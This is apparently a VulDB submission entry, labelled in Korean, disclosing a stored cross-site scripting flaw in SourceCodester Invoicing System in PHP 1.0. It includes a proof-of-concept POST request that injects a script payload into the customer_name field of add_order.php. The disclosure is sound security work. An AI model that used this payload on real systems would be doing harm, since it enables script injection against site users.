| 제목 | SourceCodester Invoicing System In PHP 1.0 Stored XSS |
|---|
| 설명 | Invoice templates render database-backed values directly into HTML without output encoding. If an attacker can inject malicious content into customer, seller, or related invoice fields, the payload will execute when the invoice page is viewed.
Proof of Concept (PoC):
Below is a POST request demonstrating the vulnerability using a Stored XSS payload injected into an invoice field:
POST /InvoicingSystem_PHP/Invoicing/add_order.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session>
customer_name=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&seller_name=test&amount=100
|
|---|
| 원천 | ⚠️ https://gist.github.com/c4ttr4ck/97c5babe1f16fa3243333528a40b7550 |
|---|
| 사용자 | c4ttr4ck (UID 75518) |
|---|
| 제출 | 2026. 04. 26. PM 11:28 (2 개월 ago) |
|---|
| 모더레이션 | 2026. 05. 24. AM 08:38 (27 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 365395 [SourceCodester Indian Invoicing System 까지 0.x/1.0 Invoice Template Render Database-Backed /Invoicing/add_order.php customer_name 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|